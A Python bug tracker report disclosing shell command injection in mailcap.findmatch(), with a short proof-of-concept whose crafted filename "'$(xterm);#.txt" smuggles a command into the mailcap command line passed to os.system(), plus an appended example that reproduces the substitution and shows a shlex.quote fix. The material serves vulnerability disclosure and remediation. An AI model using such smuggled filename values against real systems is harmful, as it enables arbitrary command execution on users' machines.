New submission from Bernd Dietzel: if the filename contains shell commands they will be executed if they are passed to os.system() as described in the docs. Filename should be quoted with quote(filename) to fix the bug.

https://docs.python.org/2/library/mailcap.html "mailcap.findmatch(/caps/, /MIMEtype/[, /key/[, /filename/[, /plist/]]]) Return a 2-tuple; the first element is a string containing the command line to be executed (which can be passed to *os.system()*), ......"

Exploit demo which runs xterm but should not:

=============================
import mailcap
import os

d = mailcap.getcaps()
# The filename is substituted into the mailcap command line unquoted,
# so the shell metacharacters in it survive into the command.
commandline, MIMEtype = mailcap.findmatch(d, "text/*", filename="'$(xterm);#.txt")
## commandline = "less ''$(xterm);#.txt'"
os.system(commandline)
## xterm starts
=============================

By the way ... please do not use os.system() in your code, it makes it unsafe.

Best regards
Bernd Dietzel
Germany

----------
components: Library (Lib)
files: screenshot.png
messages: 247857
nosy: TheRegRunner
priority: normal
severity: normal
status: open
title: mailcap.findmatch() ........ Shell Command Injection in filename
type: security
versions: Python 2.7
Added file: http://bugs.python.org/file40099/screenshot.png

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue24778>
_______________________________________
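The following is an added example, not part of the report above and not the stdlib's mailcap code: it reproduces the unquoted %s substitution the report describes on a constructed mailcap entry, shows a conservative allow-list check that flags the reported filename, and shows the quote(filename) fix with shlex.quote so the filename reaches the viewer as a single argument. The entry string, the allow-list regex and the function names are assumptions made for this example.

```python
import re
import shlex

# Constructed mailcap-style entry; mailcap substitutes the filename for %s.
# (Assumed shape for the example; real entries may also use %t, %{param}.)
ENTRY_QUOTED_IN_MAILCAP = "less '%s'"   # what the report's output implies
ENTRY_BARE = "less %s"                  # the more common form

# Allow-list of characters that need no quoting in a POSIX shell word.
# Anything outside it (quotes, $, ;, spaces, parentheses, ...) is treated
# as shell-significant. Conservative and assumed for this example.
_UNSAFE = re.compile(r"[^\w@%+=:,./-]")


def find_unsafe(filename):
    """Return the first shell-significant character in filename, or None."""
    match = _UNSAFE.search(filename)
    return match.group(0) if match else None


def build_command(entry, filename):
    """Naive substitution, mirroring the unquoted behaviour in the report."""
    return entry.replace("%s", filename)


def build_command_quoted(entry, filename):
    """Hardened variant: quote the filename so the shell sees exactly one word.

    Use with an entry whose %s is NOT already wrapped in quotes; shlex.quote
    supplies its own quoting and nesting it inside '%s' would break the word.
    """
    return entry.replace("%s", shlex.quote(filename))


def argv_for(command):
    """Tokenize a command the way a POSIX shell would, without running it.

    Useful as a check that the quoted filename survives as a single argv
    element (and as argv for subprocess.run() with shell=False, when the
    entry itself contains no pipes or redirections).
    """
    return shlex.split(command)


if __name__ == "__main__":
    reported = "'$(xterm);#.txt"          # the filename from the report
    print("unsafe char:", find_unsafe(reported))
    print("naive:      ", build_command(ENTRY_QUOTED_IN_MAILCAP, reported))
    print("quoted:     ", build_command_quoted(ENTRY_BARE, reported))
    print("argv:       ", argv_for(build_command_quoted(ENTRY_BARE, reported)))
```

The naive result equals the command line shown in the report's comment, while the quoted form tokenizes back to ["less", "'$(xterm);#.txt"], a literal filename and nothing more.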